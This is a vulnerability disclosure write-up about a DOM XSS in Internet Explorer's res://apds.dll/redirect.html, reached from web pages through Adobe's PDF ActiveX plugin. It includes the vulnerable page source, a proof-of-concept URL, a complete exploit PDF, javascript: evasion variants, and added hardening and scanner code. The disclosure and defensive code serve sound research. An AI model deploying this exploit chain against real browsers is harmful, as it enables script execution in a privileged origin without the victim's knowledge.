From http:// domain to res:// domain XSS by using Adobe's PDF ActiveX plugin in IE

by Heige(a.k.a Superhei) of KnownSec 404 Team 03/19/2019

[Article release: https://paper.seebug.org/860/]

1 res://apds.dll/redirect.html DOM XSS

Project Zero issue 1598 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&desc=5) reported an XSS vulnerability in res://apds.dll/redirect.html, and it is still unfixed as of this writing.

It is a textbook DOM XSS: the page's own script pulls the target query parameter out of window.location.search, percent-decodes it once, and hands it straight to window.location.replace(), so a javascript: URL is executed in the res://apds.dll origin. The code of res://apds.dll/redirect.html:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  <script type="text/javascript">
    var targetParamRegex = /[\?\&]target=([^\&\#]+)/i;
    var targetResults = targetParamRegex.exec(window.location.search);
    if (targetResults) {
      window.location.replace(decodeURIComponent(targetResults[1]));
    }
  </script>
</head>
<body>
</body>
</html>

POC:

res://apds.dll/redirect.html?target=javascript:alert(1)
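To make the sink concrete, here is an added example (not Microsoft's code and not from the original post) that reduces the redirect logic above to a pure function and places a hardened variant next to it. The http/https allow-list, the function names and the sample queries are assumptions chosen for illustration:

```javascript
// Added example, not code from Microsoft or from the original post.
// It reduces the redirect logic of res://apds.dll/redirect.html to a pure
// function (same regex, same single decodeURIComponent, same "hand the
// result to location.replace()" sink) and puts a hardened variant beside it.

// Identical to the resource page: "target=" up to the next "&" or "#".
const targetParamRegex = /[\?\&]target=([^\&\#]+)/i;

// What the vulnerable page ends up passing to window.location.replace().
// Returns null when no target parameter is present.
function vulnerableTarget(search) {
  const m = targetParamRegex.exec(search);
  return m ? decodeURIComponent(m[1]) : null;
}

// Hardened variant (assumption: only absolute http/https targets are ever
// legitimate). The decoded value is parsed with the WHATWG URL parser and
// the scheme is checked after parsing, so "javascript:", "JavaScript:",
// "%6Aavascript:", leading whitespace/control characters and
// protocol-relative "//host" all come back as null instead of a navigation.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

function safeTarget(search) {
  let decoded;
  try {
    decoded = vulnerableTarget(search); // decodeURIComponent throws on bad %xx
  } catch (e) {
    return null;
  }
  if (decoded === null) return null;
  let url;
  try {
    url = new URL(decoded); // throws on relative or schemeless input
  } catch (e) {
    return null;
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Constructed sample queries: the PoC payload and a few evasion variants.
const DEMO_QUERIES = [
  "?target=javascript:alert(1);//",
  "?target=%6Aavascript%3Aalert(1)",
  "?x=1&target=JavaScript:alert(1)#frag",
  "?target=//attacker.example",
  "?target=https%3A%2F%2Fexample.com%2Fpath",
];

// Side-by-side result for each query: what the page would navigate to
// versus what the hardened check lets through.
function demo() {
  return DEMO_QUERIES.map((q) => ({
    query: q,
    vulnerable: vulnerableTarget(q),
    hardened: safeTarget(q),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const row of demo()) console.log(row);
}
```

Run with node and every javascript: variant shows up in the vulnerable column while only the https URL survives the hardened one; note that the original page does not even catch the URIError that a malformed percent sequence raises.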

2 from http:// domain to res:// domain

Normally a page on an http:// origin is not allowed to navigate to res:// resources. The XFA JavaScript method xfa.host.gotoURL() in Adobe Reader can open URLs of several schemes, including http(s):// and file://, and in general Adobe shows a security warning before following such a URL when the PDF is opened.

But when xfa.host.gotoURL() is used to open a res:// or http(s):// URL through Adobe's PDF ActiveX plugin inside IE:

xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");

no security warning appears, the navigation is followed, and the XSS payload alert(1) is executed in the res://apds.dll origin.

POC: http://xxxxxxx/r.pdf

r.pdf code:

%PDF-1.4
1 0 obj
<<>>
%endobj

2 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
  <interactive>1</interactive>
</pdf></present></config>

<template>
  <subform name="a">
    <pageSet/>
  </subform>
</template>
</xdp:xdp>
endstream
endobj

trailer
<<
/Root
  <<
  /Pages <<>>
  /AcroForm
    <<
    /XFA 2 0 R
    >>
  /OpenAction
    <<
    /S/JavaScript
    /JS(
      xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");
    )
    >>
  >>
>>
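As an added example that is not part of the original post, the following scanner flags PDFs carrying this pattern: it pulls inline /JS strings out of the file, looks for xfa.host.gotoURL() calls and classifies the target scheme. The embedded sample is a constructed, abridged copy of r.pdf; the severity labels and helper names are my own choices, and indirect /JS objects and compressed streams are deliberately out of scope:

```javascript
// Added example, not part of the original post: a static check that flags
// PDFs whose embedded JavaScript calls xfa.host.gotoURL() with a res://,
// javascript: or file: target, the pattern r.pdf relies on. It resolves
// literal "( ... )" and hex "< ... >" /JS strings only; a production scanner
// would also follow "/JS n 0 R" indirect objects and inflate stream objects.

// Constructed sample input: an abridged copy of the r.pdf PoC (ASCII quotes).
const SAMPLE_PDF = `%PDF-1.4
2 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><config><present><pdf><interactive>1</interactive></pdf></present></config><template><subform name="a"><pageSet/></subform></template></xdp:xdp>
endstream
endobj
trailer
<< /Root << /Pages <<>> /AcroForm << /XFA 2 0 R >>
/OpenAction << /S/JavaScript /JS(
  xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");
) >> >> >>`;

// Read a PDF literal string whose "(" sits at index start. Handles balanced
// nested parentheses and backslash escapes (octal escapes and line
// continuations are not handled). Returns {value, end} or null if unterminated.
function readLiteralString(text, start) {
  const esc = { n: "\n", r: "\r", t: "\t", b: "\b", f: "\f" };
  let depth = 0, out = "";
  for (let i = start; i < text.length; i++) {
    const c = text[i];
    if (c === "\\") { const n = text[i + 1]; out += esc[n] || n || ""; i++; continue; }
    if (c === "(" && ++depth === 1) continue;              // opening delimiter
    if (c === ")" && --depth === 0) return { value: out, end: i + 1 };
    out += c;
  }
  return null;
}

// Every /JS value that is an inline literal or hex string.
function extractJsStrings(pdf) {
  const out = [];
  const re = /\/JS\b\s*/g;
  let m;
  while ((m = re.exec(pdf)) !== null) {
    const pos = m.index + m[0].length;
    if (pdf[pos] === "(") {
      const s = readLiteralString(pdf, pos);
      if (s) { out.push(s.value); re.lastIndex = s.end; }
    } else if (pdf[pos] === "<") {
      const end = pdf.indexOf(">", pos);
      if (end > pos) {
        let hex = pdf.slice(pos + 1, end).replace(/\s+/g, "");
        if (hex.length % 2) hex += "0";                     // PDF pads an odd trailing digit
        out.push((hex.match(/../g) || []).map((h) => String.fromCharCode(parseInt(h, 16))).join(""));
        re.lastIndex = end + 1;
      }
    }
  }
  return out;
}

// String arguments of xfa.host.gotoURL(...) calls inside a JS snippet.
function gotoUrlTargets(js) {
  const re = /xfa\.host\.gotoURL\s*\(\s*(["'])([^"']*)\1/g;
  const out = [];
  let m;
  while ((m = re.exec(js)) !== null) out.push(m[2]);
  return out;
}

// Scheme after leading whitespace/control characters, lower-cased, or null.
function schemeOf(url) {
  const m = /^[\s\x00-\x1f]*([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Severity is a local choice: res/javascript/file reach an origin or the
// file system the PDF should never touch; http(s) is navigation without the
// prompt the text above says is missing under the IE plugin.
function scanPdf(pdf) {
  const findings = [];
  for (const js of extractJsStrings(pdf)) {
    for (const target of gotoUrlTargets(js)) {
      const scheme = schemeOf(target);
      let severity = "info";
      if (["res", "javascript", "file"].includes(scheme)) severity = "high";
      else if (scheme === "http" || scheme === "https") severity = "medium";
      // A redirect.html hop: surface the inner target the browser will run.
      const inner = /[?&]target=([^&#]+)/i.exec(target);
      let redirectTarget = null;
      if (inner) {
        try { redirectTarget = decodeURIComponent(inner[1]); } catch (e) { redirectTarget = inner[1]; }
      }
      findings.push({ target, scheme, severity, redirectTarget });
    }
  }
  return { hasXfa: /\/XFA\b/.test(pdf), hasOpenAction: /\/OpenAction\b/.test(pdf), findings };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(scanPdf(SAMPLE_PDF), null, 2));
}
```

On the sample this reports one high-severity finding with scheme res and the inner target javascript:alert(1);//, together with the /XFA and /OpenAction flags; a PDF whose /JS only calls app.alert() produces no finding.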

demo tweet https://twitter.com/80vul/status/1048576146835558400

3 fixed?

Because of the security domain isolation in IE, the harm of an XSS in the res:// domain is limited. Still, I think Microsoft should fix the res://apds.dll/redirect.html XSS vulnerability, and Adobe should either block URL redirects from the plugin or show the corresponding security warning when one happens. The world can be more beautiful and harmonious!

4 Timeline

October 04, 2018 Reported to Adobe PSIRT and MSRC
October 05, 2018 Adobe tracking number PSIRT-8981
October 09, 2018 MSRC Case 47932 CRM:0461065793
October 18, 2018 Adobe PSIRT still investigating
November 21, 2018 MSRC: "completed our investigation and determined that the case doesn't meet the bar for immediate servicing in a security update."
March 19, 2019 Public disclosure